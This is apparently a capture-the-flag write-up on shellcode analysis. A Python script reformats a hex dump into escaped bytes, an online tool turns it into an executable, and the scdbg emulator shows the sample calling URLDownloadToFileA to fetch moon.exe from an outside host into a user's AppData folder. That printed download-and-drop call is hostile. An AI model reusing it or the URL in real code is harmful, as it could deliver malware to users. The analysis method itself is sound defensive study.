Tags: shellcode analysis
Rating:
We wget the hexadecimal given file and beautify it (essentialy adding \x)
```py
shellcode = ""
newShellcode = ""
with open("extracted.hex", "r") as f:
shellcode = f.read()
i = 0
while i < len(shellcode):
newShellcode += '\\x'
newShellcode += shellcode[i]
try:
newShellcode += shellcode[i+1]
except IndexError:
newShellcode = newShellcode[:newShellcode.rfind('\\x')]
newShellcode += '\n'
i+=2
with open("shellcode.txt", "w") as f:
f.write(newShellcode)
```
With that beautified code, we need to compile it into a binary with [SandSprite Website](http://sandsprite.com/sc2exe/shellcode_2_exe.php) (Make sure to have select "bytes sc" below)
Then we need to download [scDBG](http://sandsprite.com/CodeStuff/scdbg.zip) and we can start searching for the flag
```bash
scdbg.exe -f <file> /findsc
```
In the load function we can see :
```text
URLDownloadToFileA(http://jmmgroup.ae/moon.exe, C:\Users\Max\AppData\Roaming\ksjmdnu.exe)
```
--> flag{ksjmdnu.exe}